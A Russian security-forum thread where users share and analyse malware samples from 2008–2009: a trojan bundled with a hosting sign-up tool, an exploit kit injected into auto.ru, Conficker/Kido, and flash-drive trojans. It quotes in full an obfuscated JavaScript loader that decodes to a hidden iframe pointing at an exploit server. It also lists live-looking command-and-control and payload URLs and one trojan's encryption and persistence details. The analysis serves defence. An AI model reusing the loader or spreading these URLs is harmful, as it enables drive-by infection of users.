В этом топике происходит исследование малвари: вирусни, троянов, как их вычистить и тд.

| Сообщение посчитали полезным:

вставлю свое ИМХО

http://radikal.ru/F/s60.radikal.ru/i167/0812/ab/fb5356acd9ef.jpg

виста сп1 IE7

-----
Md5 fcbb6c9c9a5029b24d70f2d67c7cca74

| Сообщение посчитали полезным:

Stack, я тебе честно говорю - у приятеля не отображается. сам смотрел. билды разные

| Сообщение посчитали полезным:

SVIN95
Правой гайкой на названия столбцов клацай и выберай дополнительные столбцы (в том числе и столбец файл).

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

Во время регистрации на одном бесплатном хостинге, было предложено скачать прожку, которая проверяет ip, выдает код подтверждения что-то на сервере сравнивает.
Иначе хост они не регистрируют.
Я скачал, подтвердил регистрацию. Но потом в системе появился файл nvsyst32.exe.
Раньше его не было.
Прикрепляю оба файла.

0dad_20.12.2008_CRACKLAB.rU.tgz - ip_confirm.rar

| Сообщение посчитали полезным:

Trojan.Win32.Agent.arjp

советую удалить - кроме nvsyst32.exe
HKLM\​Software\​Microsoft\​DownloadManager


груззицо сюды:
members.000webhost.com/ip_confirm.php
и
goffhouseinn.com/tmp/.images/nvsyst32.exe

| Сообщение посчитали полезным:

На auto.ru кстатете сейчас наблюдаю связку эксплоитов fiesta.
админы там дебилы

21.12.2008 7:06:59 hxxp://91.211.64.191/f/load.php?id=144&spl=5 Internet Explorer Запрещено: Trojan.Win32.Inject.low

при заходе на auto.ru
ехе щас разбераю, стату ... как не сложно догадатся можно посматреть туд 91.211.64.191/f/admin.php

| Сообщение посчитали полезным:

inf1kek спам бот там заливается

-----
Nulla aetas ad discendum sera

| Сообщение посчитали полезным:

inf1kek бинарь Trojan.Win32.Inject.low скинь плз

-----
Gutta cavat lapidem. Feci, quod potui. Faciant meliora potentes

| Сообщение посчитали полезным:

coderess dump.ru/file/1344384

-----
Nulla aetas ad discendum sera

| Сообщение посчитали полезным:

Ты смотри
не прошло и дня, как они врубили "профилактику"

собственно как оно было - вроде сам ифрейм "правельно" сделан, а вот эксплоит - вешает браузер и ехе палится поэтому ставлю тем кто это делал - двойку

На странице, можно было найти сей непримечательный код:

<div class="block" align=center><script src=http://82.138.58.138/auto/banner.js?st></script></div>

Причем, покрутив этот яваскрипт до конца я увидел:

ffft="6d366d646d376c356d666d356d656c3630656c6c6c306d626c366d35306 3306c37676d626d6d6c306d316d666d3530326c376c306d37376630306d636c366c366 c323761306430643762373130653730373137313065376d37363065373137623731306 46d6d30646d626d656d366d356c6330656c326d636c32303030326d306d646c306d366 d356c30376630303732303030326c6c6d626d366c366d63376630303732303030326d6 36d356d626d6c6d636c3637663030373230303765376730646d626d6d6c306d316d666 d353765306c306237606d6d6d6d6c366c363766303036656d31366530303760";fftt= "";ftff="function ftft() {ftftf=eval;fffff=unescape;fttt=String.fromCharCode;fttf=Math.PI;ftfff =parseInt;ffttf=ftfff(~((fttf&fttf)|(~fttf&fttf)&(fttf&~fttf)|(~fttf&~ fttf)));ffftt=ftfff(((ffttf&ffttf)|(~ffttf&ffttf)&(ffttf&~ffttf)|(~fft tf&~ffttf))&1);ffff=ffftt<<ffftt;fttft=ffttf;for(fffft=ffttf;fffft<ftf f.length;fffft-=-ffftt) fttft+=ftfff(ftff.charCodeAt(fffft));fttft.toString();fttft%=fffff(0x6 4);for(fttff=ffttf;fttff<(ffft.length>>ffff);fttff-=-ffftt) {ffttt='';fftff='';for(ffftf=ffttf;ffftf<(ffftt<<ffff);ffftf-=-ffftt) if(ffftf<ffff) ffttt+=ffft.charAt(fttff*(ffff<<ffftt)+ffftf);else fftff+=ffft.charAt(fttff*(ffftt<<ffff)+ffftf);fftt+=fttt(fffff(0xFF)-f tfff(fffff('%'+(((ftfff(ffttt,(ffff<<ffftt)<<ffff)^fttft)<15.5)?ffttf. toString():'')+Math.round(ftfff(ffttt,(ffff<<ffftt)<<ffff)^fttft).toSt ring((ffff<<ffftt)<<ffff))+fffff('%'+(((fttft^ftfff(fftff,ffff<<(ffftt +ffff)))<15.5)?ffttf.toString():'')+Math.round(ftfff(fftff,ffff<<(ffft t+ffff))^fttft).toString(ffff<<(ffftt+ffff))),ffff<<(ffff+ffftt)));}tr y {ftftf(fftt);} catch(e) {try{eval(fftt);} catch(e) {fftf=ffftt;}try {if(fftf) {window.location='/';}} catch(e) {}}}ftft();";eval(ftff);

нипанятно на что расчитывал автор, делая столько похожих на "глаз" переменных
на что расчет?
тем временем "крипт" легко расшифровывается и получается:

<iframe src="http://91.211.64.191/f/index.php" border="0" width="0" height="0"></iframe>

а дальше все понятно



упдейт: после профилактики - ифрейм все висит авторы проекта решили подразаботать?

| Сообщение посчитали полезным:

Trojan.Win32.Inject.low
Имя файла: load.exe
Размер: 17 Кб
www.virustotal.com/ru/analisis/f0d657b9d5700bee01aa9744b46ddd16 <--
В файле практически нет строк в открытом виде, что необходимо для работы троян держит в зашифрованном виде. При необходимости расшифровывает нужные строки, использует, и зашифровывает обратно. Шифрование ведется с помощью не хитрой формулы: a[i]=(a[i]^(2*(i+1)))^7. Имена функций также не хранятся в открытом виде, используется хеш от имени. Программа записывает себя в автозапуск через ключ реестра: “SYSTEM\CurrentControlSet\Control\SecurityProviders” под именем digeste.dll.

Программа использует в качестве мютекса строку BYPPROCNET, которая также хранится в зашифрованном виде. Далее троян запускает зомби процесс svchost.exe и копирует в него файл, который содержится в секции данных в зашифрованном виде.
Размер: 9 Кб
Time/Date Stamp (GMT): 17 декабря 2008 г. 21:18:10
www.virustotal.com/ru/analisis/afd200551216d0f3401d8225289654a1 <--
Сразу на точке входа троян инициализирует свой импорт, находит адреса нужных функций с помощью LoadLibrary и GetProcAddress. Причем имена функций не скрыты, а просто находятся в секции данных в открытом виде. Далее троян расшифровывает строки, которые содержат IP адрес сайта управляющего ботнетом 91.211.64.191. Бот скачивает и сайта файлы и запускает их на выполнение. Файлы могут быть запущенны под прикрытием процесса svchost.exe.


| Сообщение посчитали полезным:

GMax
Еще инфа novirusthanks.org/blog/?p=542

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

Успешно прислали, второй раз - сам попросил. Откуда? - отсюда:

evartist.narod.ru
или live-counter.net/load.php?id=123456

Куда обращается load[1].exe (сам он из времменых файлов интернета):

InternetOpenUrlA(CC0004,'http://webexperience13.com/o.php?4b7a705=1230 392&id=”л&v=6','0h',0,84000000,0)
InternetOpenUrlA(CC0004,'http://microupdate80.info/pic_o1.gif?4e61536= 1230396&id=”л&v=6','0h',0,84000000,0)
InternetOpenUrlA(CC0004,'http://microupdate80.info/template_momo.txt?4 f1b04d=1230403&id=”л&v=6','0h',0,84000000,0)

Доигрался. Он догрузил себе код в тот же процесс и запустил, а я этого не уловил.
Успел п.дла попортить несколько экзэшников. Потом я восстановил в течении часа все на место.
А до этого 380 мБ программ пришлось выкинуть. По-остороженее с ним. На диске следов нет, кроме как заражает все экзешники.

microupdate80.info - Rights restricted by copyright. See www.ripe.net/db/copyright.html
webexperience13.com - тоже

Интересно как антивирусники его детектят.

| Сообщение посчитали полезным:

А до этого 380 мБ программ пришлось выкинуть
если он заражает - разве сложно было полечить? многие ав это умеют

| Сообщение посчитали полезным:

Может KAV и умеет. Что-то сомневаюсь я в этом. Вирус новый наверное. Да я и сам мог бы научиться лечить, да лень-матушка. Я забыл включить фичу в санбоксе TEB.PPEB.PPEB_LDR_DATA.LIST_ENTRY : InInitializationOrderModuleList.Flink подменить там kernel32 на мой перехватчик. Не разобрался ещё с этим делом. Хотя этого мало. Вирус слишком умный. Лучше не играться с ним, а мочить 'в сортире' (временных файлах интернета) всё подряд.

| Сообщение посчитали полезным:

C младшими и их игрушками \ кряками_непонятно_откуда_слитыми мой комп превращается в полигон новых троев, вашу медь. Нод2.7 откровенно разочаровывает. Базы от 1.1.2009 в упор ничего в файле не видят.
Сам ещё не ковырял, инжектируемую либу убил, а осталоное пока не смотрел. Очевидно, что то есть, ибо на www.kaspersky.ru/virusscanner и virustotal не пускает. hosts наверное.
Вообщем это флешко-троян, стандартно, autorun.inf. Кстати, как так получается, что в inf куча левый байтов, как в куче какого-то hex мусора, а он нормально работает. По идее он текстового формата должен же быть?
В аттаче набор с флешки, скрытые-системные, если что.

6baa_05.01.2009_CRACKLAB.rU.tgz - !warn_troy.rar

| Сообщение посчитали полезным:

Freecod
вот вам с VT результаты:
a-squared 4.0.0.73 2009.01.06 -
AhnLab-V3 2009.1.5.3 2009.01.06 -
AntiVir 7.9.0.45 2009.01.05 Worm/Kido.DH
Authentium 5.1.0.4 2009.01.05 -
Avast 4.8.1281.0 2009.01.05 -
AVG 8.0.0.199 2009.01.05 Dropper.Generic.AFNC
BitDefender 7.2 2009.01.06 -
CAT-QuickHeal 10.00 2009.01.06 -
ClamAV 0.94.1 2009.01.06 -
Comodo 878 2009.01.05 -
DrWeb 4.44.0.09170 2009.01.06 -
eTrust-Vet 31.6.6293 2009.01.06 -
Ewido 4.0 2008.12.31 -
F-Prot 4.4.4.56 2009.01.05 -
F-Secure 8.0.14470.0 2009.01.06 -
Fortinet 3.117.0.0 2009.01.06 -
GData 19 2009.01.06 -
Ikarus T3.1.1.45.0 2009.01.06 Net-Worm.Win32.Kido
K7AntiVirus 7.10.576 2009.01.05 -
Kaspersky 7.0.0.125 2009.01.06 Net-Worm.Win32.Kido.dh
McAfee 5486 2009.01.05 W32/Conficker.worm.gen.b
McAfee+Artemis 5486 2009.01.05 W32/Conficker.worm.gen.b
Microsoft 1.4205 2009.01.06 Worm:Win32/Conficker.B
NOD32 3741 2009.01.05 -
Norman 5.80.02 2009.01.02 -
Panda 9.0.0.4 2009.01.05 W32/Conficker.C.worm
PCTools 4.4.2.0 2009.01.05 -
Prevx1 V2 2009.01.06 -
Rising 21.11.12.00 2009.01.06 -
SecureWeb-Gateway 6.7.6 2009.01.06 -
Sophos 4.37.0 2009.01.06 Mal/Conficker-A
Sunbelt 3.2.1809.2 2008.12.22 -
Symantec 10 2009.01.06 W32.Downadup
TheHacker 6.3.1.4.205 2009.01.05 -
TrendMicro 8.700.0.1004 2009.01.06 WORM_DOWNAD.AD
VBA32 3.12.8.10 2009.01.05 Net-Worm.Win32.Kido.dh
ViRobot 2009.1.6.1546 2009.01.06 -
VirusBuster 4.5.11.0 2009.01.05 -

-----
Crack your mind, save the planet

| Сообщение посчитали полезным:

Вот и я о то же. Но все о моде говорят, причём в отличие от стандартного kavo у этого ещё служба висела, которая блочила AV сайты. Да и нод с базами от 5-го палит только основной модуль, а службу - игнорирует.

| Сообщение посчитали полезным:

Freecod пишет:
Кстати, как так получается, что в inf куча левый байтов, как в куче какого-то hex мусора, а он нормально работает. По идее он текстового формата должен же быть?
Видимо, перед этой кучей мусора просто точка с запятой ; стоит, и вся строка до символа переноса считается закомментированной

-----
Stuck to the plan, always think that we would stand up, never ran.

| Сообщение посчитали полезным:

Зверька подцепил, выводит сообщения что комп заражен и предложением запустить antispyware и что-то про какой-то там avi . Инжектирует dll'ку.
Веб 5, AVZ, Kaspersky Virus Removal Tool ничего не нашли, выцепил нодом. Все тулзы с последними базами были.
В архиве сам exe и dll.

2dda_09.01.2009_CRACKLAB.rU.tgz - Archive.7z

| Сообщение посчитали полезным:

Блин, везёт. А я бы автору мода, который подцепил я, яйца бы за быдлокодинг открутил. Т.к. описание файла dll было по русски, есть вероятность что он читает - "Выпрями руки, неудачник!" На SP3 его убожество регулярно роняет систему ошибкой svchost в AcGenral.dll, прягая в середину команды. Очевидно он себя не перетруждал, и сделал фикс. набор адресов api. Но сервис, распихивающий по флешкам, запрятал неплохо. Понятно что атачится к svchost, но длл в списке потоков так и не нашёл. Функционал дохнет только после убивства основной нити svchost.

| Сообщение посчитали полезным:

Аффтор прог захотел пойграть с софтом и вируснёй (Кедало)

www.screen4all.com/



инсталлах вирусы =)

Пример
www.threatexpert.com/report.aspx?md5=0878bf8819a9712b4139b4b5efac03fc


По ходу аффтор с украйны

Атач с заразой
c656_09.01.2009_CRACKLAB.rU.tgz - cl.rar

| Сообщение посчитали полезным:

тоже что-то подцеиил) никак не могу найти откуда растут у этого чуда ноги.
до этого стоял нод смарт секьюрити(ну или как он там) вообщем переодически при выходе в сеть блочил IP ибо с него пыталось грузитсья какаято какашка. ну поставил outpost 2009 сообственно он тоже ничего не видит, удалил все атоматические правила и давай в ручную все смотреть. бестолку)
в итоге из симтомов имеем:
1) лочиться доступ на следующие ресурсы microsoft.com, virustotal.com, virusinfo.ru, kaspersky.ru итп)
если пытаюсь зайти на эти же ресурсы из винды которая находиться на ВмВаре то все норм)
2) у одного из svhost в раене 90 потоков(хз номр это или нет...раньше внимания не обращал), имеет в раене 10-15 подключений на 445 порту.

всякие Rku и Avz ниче подозрительного не видят тока перехваты самого оутпоста)

мож кто сталкивался с подобным?)

| Сообщение посчитали полезным:

ne0n
LIVE CD DRWEB нареж и проскань систему новыми базами. Авось чего выцепишь.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

www.viruslist.com/ru/viruses/encyclopedia?virusid=21782725
Случаем не это подцепил? Щас вроде эпидемия

-----
Лень - это подсознательная мудрость

| Сообщение посчитали полезным:

ne0n по симптомам похоже на Conficker.X

-----
Nulla aetas ad discendum sera

| Сообщение посчитали полезным:

Решил сделать такую справку. Может кому пригодиться

Вирусы: примеры вирусов с подробным описанием их кода и принципов работы. А также, здесь можно найти много интересных документов и статей вирусной тематики.
vcp.hut.ru

VirusInfo. Сайт посвящён информационной безопасности. Межсетевые экраны, антивирусы, adware , spyware, firewall, всё что связано с обеспечением безопасности в интернете и на компе.
virusinfo.info/

Страница Александра Гуськова. Авторские трояны с исходниками на msvc++.
www.chat.ru/~alguszone

AVTrojan. Всё для борьбы с троянцами. Постоянно обновляемый сайт программы AVTrojan. Можно скачать программы, обновления антивирусной базы, получить техническую поддержку.
www.trojan.ru

Чернобыльский CIH. Информация о вирусе W95.CIH . Обнаружение, лечение, ссылки на другие ресурсы о вирусах.
www.chat.ru/~azv/virus/

Мифы о компьютерных вирусах. Новые вирусы. Список вирусов.
kumite.com/myths/

Троянский клуб. Описания троянов, FAQ, новости. Результаты тестирования обнаружения троянов антивирусами. Форум. Троянские ссылки.
trojansfaq.da.ru

Безопасность в Интернет. Проблемы при работе в сети. Описание принципов работы программ типа "троян" и "nuke".
www.aha.ru/support/0231.html

Вирусные новости. Рассылка новостей. Новые вирусы. Список вирусов. Описания. Методы обнаружения и удаления.
virusnews.h1.ru

| Сообщение посчитали полезным:

Flint угу, та самая кокашка =) вообщем вроде удалил. каспером последним прогнал...ниче больше не нашел =)

| Сообщение посчитали полезным:

Нажимаю на CRACKL@B в разделе Скачать на Import REConstructor v1.7c, а мой НОД в процессе скачки пишет "вероятно модифицированный червь Win32\Stration". Может у кого была такая проблема? Там файлы вообще на антивирус кто-то проверяет? Просто интересно

| Сообщение посчитали полезным:

pollllll_n
НОД звиздит

-----
Stuck to the plan, always think that we would stand up, never ran.

| Сообщение посчитали полезным: